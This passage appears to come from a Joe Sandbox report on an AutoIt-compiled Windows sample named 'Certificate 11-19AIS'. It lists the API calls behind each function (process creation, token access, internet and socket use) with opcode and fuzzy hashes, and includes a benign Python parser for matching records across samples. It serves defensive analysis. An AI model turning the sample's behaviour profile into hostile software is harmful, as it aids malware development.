                                                                              • InterlockedIncrement.KERNEL32(00CF1F60), ref: 007D74D7
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 007D7AD8
                                                                                • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                                                • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 007D7AE5
                                                                              • __lock.LIBCMT ref: 007D7AF9
                                                                              • ___addlocaleref.LIBCMT ref: 007D7B17
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081E33D
                                                                              • _memset.LIBCMT ref: 0081E34C
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00873D00,00873D44), ref: 0081E37B
                                                                              • CloseHandle.KERNEL32 ref: 0081E38D
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              APIs
                                                                                • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                                                • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EA8E
                                                                              • LineTo.GDI32(00000000,?,?), ref: 0081EA9B
                                                                              • EndPath.GDI32(00000000), ref: 0081EAAB
                                                                              • StrokePath.GDI32(00000000), ref: 0081EAB9
                                                                              Similarity
                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                                              • AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 007EB0D6
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0DD
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007EAC9D), ref: 007EB0EA
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0F1
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 007CB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0082DE2B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0082DE38
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0082DE51
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0082DE6A
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0082DE8A
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082DE95
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007EB2DF
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 007EB2EB
                                                                              • CloseHandle.KERNEL32(?), ref: 007EB2F4
                                                                              • CloseHandle.KERNEL32(?), ref: 007EB2FC
                                                                                • Part of subcall function 007EAB24: GetProcessHeap.KERNEL32(00000000,?,007EA848), ref: 007EAB2B
                                                                                • Part of subcall function 007EAB24: HeapFree.KERNEL32(00000000), ref: 007EAB32
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                                              • Instruction ID: dfa242eca8271ea053db544ef6d5e4f1d8d18d796e73fd2ffcbb790937a91966
                                                                              • Opcode Fuzzy Hash: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                                              • Instruction Fuzzy Hash: BAE0BF36104105FBCB012B95EC08859FB76FFC83213108621F61581571DB32A871EB91
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                                              • Instruction ID: 1ff9d2d38603c789ea39901346b97a83ec2861f21f0e065bf866ceadf7b97216
                                                                              • Opcode Fuzzy Hash: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                                              • Instruction Fuzzy Hash: 25E046B1500300EFDB005F70E84DA2D7BA9FB9C350F118C19F96E8B211EBB9A8018B90
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 007EDEAA
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                                              • Instruction ID: f89a0626fd3ea22858e1e593dea8603d041308a05573b03fd2009c60f892d453
                                                                              • Opcode Fuzzy Hash: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                                              • Instruction Fuzzy Hash: 5D912570601601AFDB24CF65C888F6AB7B9FF49710F10896EF95ACB291DB74E941CB60
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 007CBCDA
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 007CBCF3
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                                              • Instruction ID: 14214436c9accaeb7aca97f5f44e7e3da2719233c00c04dcc21d77baa520256a
                                                                              • Opcode Fuzzy Hash: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                                              • Instruction Fuzzy Hash: 16513571408744DBE320AF14EC8AFAFBBE8FB94354F41484EF1C8410A2EF7495A98766
                                                                              APIs
                                                                                • Part of subcall function 007B44ED: __fread_nolock.LIBCMT ref: 007B450B
                                                                              • _wcscmp.LIBCMT ref: 007FC65D
                                                                              • _wcscmp.LIBCMT ref: 007FC670
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                                              • Instruction ID: a9460cb195bea9302dd28f145c2dc50519da688d43158ad0f203ab12135ac7f5
                                                                              • Opcode Fuzzy Hash: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                                              • Instruction Fuzzy Hash: C441D472A0420EBBDF219BA4DC46FEF77B9EF49714F000069F605EB281D6789A14CB61
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0081A85A
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0081A86F
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                                              • Instruction ID: a5fe05fb61ebb197839f5a7a3404a9dd1a0a02be3ca6b309d5c32a962f05d5f3
                                                                              • Opcode Fuzzy Hash: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                                              • Instruction Fuzzy Hash: 3741E974A013099FDB54CF68D885BDA7BB9FF08704F14046AE909EB385D770A981CF91
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00805190
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008051C6
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                                              • Instruction ID: b0f224ee0745e60fa93a55ac7e66025d1f822ab5713bafea1da0b98dfe50f9bf
                                                                              • Opcode Fuzzy Hash: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                                              • Instruction Fuzzy Hash: 59312A71C01119EBCF41EFA4CC89AEE7FB9FF18714F104015F915AA166DB35A906DBA0
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0081980E
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0081984A
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                                              • Instruction ID: 8d7086b70b22f3146f0734cdaec9432f920a5769db0741f68d41d6e6b193f88a
                                                                              • Opcode Fuzzy Hash: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                                              • Instruction Fuzzy Hash: D8318A71110604AEEB109F28CC95BFB73ADFF99764F008629F8A9C7190DA34AC81C7A0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F51C6
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F5201
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 4ef593409e9ae6116f6b8b6e2bab752b089cd30512e0efc7b666a00b76b84080
                                                                              • Instruction ID: 1c44d58eb836fe90a6284950c9eb8fbefea6790120fc383fad32c02b3dee367d
                                                                              • Opcode Fuzzy Hash: 4ef593409e9ae6116f6b8b6e2bab752b089cd30512e0efc7b666a00b76b84080
                                                                              • Instruction Fuzzy Hash: 8631C37160070CDBEB24CF99D849BBEBBB5FF45350F144119EB85A62A0D7789A44CB50
                                                                              Similarity
                                                                              • API ID: __snwprintf
                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                              • API String ID: 2391506597-2584243854
                                                                              • Opcode ID: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                                              • Instruction ID: fd73c001a937e461c19d080a2b01f0c328b408f0314aed94e64f3b5c54a9c52f
                                                                              • Opcode Fuzzy Hash: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                                              • Instruction Fuzzy Hash: 4D218971600218EBCF10EFA4CC86BEE73B4FF59300F000459F015EB281EA39EA258BA1
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081945C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00819467
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                                              • Instruction ID: 3c3309ec8c99a7b4d858e572fcd9cfd19c11980f2d390f01fad0ff80b12928a2
                                                                              • Opcode Fuzzy Hash: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                                              • Instruction Fuzzy Hash: 2A1190B1200208AFEF259E58DC90EEB376EFF983A4F110129F959D7290D6319C928764
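The per-function records above (API call sites, String ID, Opcode ID, Instruction ID and the two fuzzy hashes) are what an analyst pivots on to recognise the same AutoIt runtime or payload function in another sample. As an added example that is not part of this Joe Sandbox report or its tooling, the Python below parses records in the layout shown above into dictionaries and intersects a chosen Similarity field (Opcode ID by default) between two record sets. The layout it assumes (an APIs heading opening each record, `Name.MODULE(args), ref: ADDR` bullets with an optional `Part of subcall function ADDR:` prefix, `Key: value` bullets under Similarity) is inferred from the page text; the embedded input is constructed from values visible on this page plus clearly placeholder IDs, not taken from any other report.

```python
"""Parse Joe Sandbox per-function records (the APIs / Strings / Similarity blocks in
the report text) so API names, String IDs, Opcode IDs and fuzzy hashes can be
pivoted across samples.

Added example for this page, not Joe Sandbox code or an official export format.
Assumed layout (inferred from the report text): each record opens with an "APIs"
heading; API bullets read "Name.MODULE(args), ref: ADDR", optionally prefixed
"Part of subcall function ADDR: "; "Similarity" bullets read "Key: value".
"""
import re
from collections import defaultdict

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}

API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


def parse_records(text):
    """Return one dict per function record: {'apis': [...], 'similarity': {...}}."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()      # drop bullet and indentation
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                       # an APIs heading opens a record
                current = {"apis": [], "similarity": {}}
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                current["apis"].append({
                    "name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": [a for a in (m["args"] or "").split(",") if a],
                    "subcall": m["sub"],             # callee address, None if direct
                })
        elif section == "Similarity":
            key, _, value = line.partition(":")
            current["similarity"][key.strip()] = value.strip()
    return records


def direct_api_names(record):
    """APIs the function calls itself; 'Part of subcall function' entries excluded."""
    return [a["name"] for a in record["apis"] if a["subcall"] is None]


def index_by(records, key):
    """Map each value of a Similarity field (e.g. Opcode ID) to the records carrying it."""
    index = defaultdict(list)
    for r in records:
        value = r["similarity"].get(key)
        if value:
            index[value].append(r)
    return index


def shared_ids(records_a, records_b, key="Opcode ID"):
    """Values of `key` present in both sets, i.e. functions reused unchanged."""
    return set(index_by(records_a, key)) & set(index_by(records_b, key))


# Constructed input. SAMPLE_A transcribes two records from this report (dump-source
# lines omitted). SAMPLE_B is constructed: it repeats the Sleep/GlobalMemoryStatusEx
# function at a made-up address and adds a record with placeholder IDs.
SAMPLE_A = """\
APIs
• Sleep.KERNEL32(00000000), ref: 007CBCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 007CBCF3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
APIs
  • Part of subcall function 007B44ED: __fread_nolock.LIBCMT ref: 007B450B
• _wcscmp.LIBCMT ref: 007FC65D
• _wcscmp.LIBCMT ref: 007FC670
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• Opcode ID: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
"""

SAMPLE_B = """\
APIs
• Sleep.KERNEL32(00000000), ref: 004ABCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 004ABCF3
Similarity
• API ID: GlobalMemorySleepStatus
• Opcode ID: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
APIs
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004B51C6
Similarity
• API ID: CrackInternet_memset
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    a, b = parse_records(SAMPLE_A), parse_records(SAMPLE_B)
    for r in a:
        print(r["similarity"]["API ID"], direct_api_names(r))
    print("shared Opcode IDs:", shared_ids(a, b))
```

Opcode ID matches mean byte-identical function bodies; to catch near-matches (the same function rebuilt with different addresses), index on `Opcode Fuzzy Hash` or `Instruction Fuzzy Hash` instead and compare the hashes with a similarity measure rather than equality.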
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00819968
                                                                              • GetSysColor.USER32(00000012), ref: 00819982
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                                              • Instruction ID: 8da967200e29dca75ea4d3cec1d8adda00cc73288bd42559b525bef36646a10c
                                                                              • Opcode Fuzzy Hash: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                                              • Instruction Fuzzy Hash: BF112972510209AFDB04DFB8CC45EEA7BA8FF48344F054629F996D3250E734E850DB60
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00819699
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008196A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                                              • Instruction ID: fa17beda6926d17edcd214b21535a0fd42972e05b3fd301dfa81b431cb970ebd
                                                                              • Opcode Fuzzy Hash: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                                              • Instruction Fuzzy Hash: 8B115871500208AAEB109E68AC64EEB3B6EFF253A8F104714F9A9D71E0C735DC919760
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F52D5
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007F52F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                                              • Instruction ID: 1659d3b9efee780f59226176bb13ae072c8daf1992994d3957b923ef1b7dd812
                                                                              • Opcode Fuzzy Hash: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                                              • Instruction Fuzzy Hash: 4511D072A01628ABDB20DA9CD948BBD77B8BF05798F040125EB05E7394D3B4ED04C791
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00804DF5
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00804E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                                              • Instruction ID: 24bc5c2f0b287d8971544d568c64221709e4254355f00aa8651fd6d4c311a400
                                                                              • Opcode Fuzzy Hash: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                                              • Instruction Fuzzy Hash: FE11C2B0541225FBDB658F51CC89EFBFBA8FF06764F10922AFA15D6180D3705954C6E0
                                                                              APIs
                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0080A88B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              • Opcode ID: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                                              • Instruction ID: 412bbd13a0150421c4231f16f9b9ed7cb7186ff29ff3e264256945ab7ce6d69d
                                                                              • Opcode Fuzzy Hash: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                                              • Instruction Fuzzy Hash: 5B01D275200308ABCB199F68DC8AFADB364FF44314F10852AF516EB2D1DB75E8068752
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007EB7EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                                              • Instruction ID: 075660701f397453cdef9f1e7b3fc2a50071512ccb2570cc9d3efa03c754748e
                                                                              • Opcode Fuzzy Hash: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                                              • Instruction Fuzzy Hash: 3601B1B1642154EBCB05EBA4CC56AFF33A9BF4A350B04061DF472A72D2EB785D188B90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 007EB6EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                                              • Instruction ID: eb96c948280d578ea793ac66b4857d8a0e5eb51067ba5f436f46dc4be0df904a
                                                                              • Opcode Fuzzy Hash: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                                              • Instruction Fuzzy Hash: 2801A7B1642144EBCB05EBA5C957FFF77B89F09344F100019B512B32C1DB589E1887B5
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 007EB76C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                                              • Instruction ID: 5d992c88eab948f0317267733fb93f6589ffd667521ab23700afac443178f10f
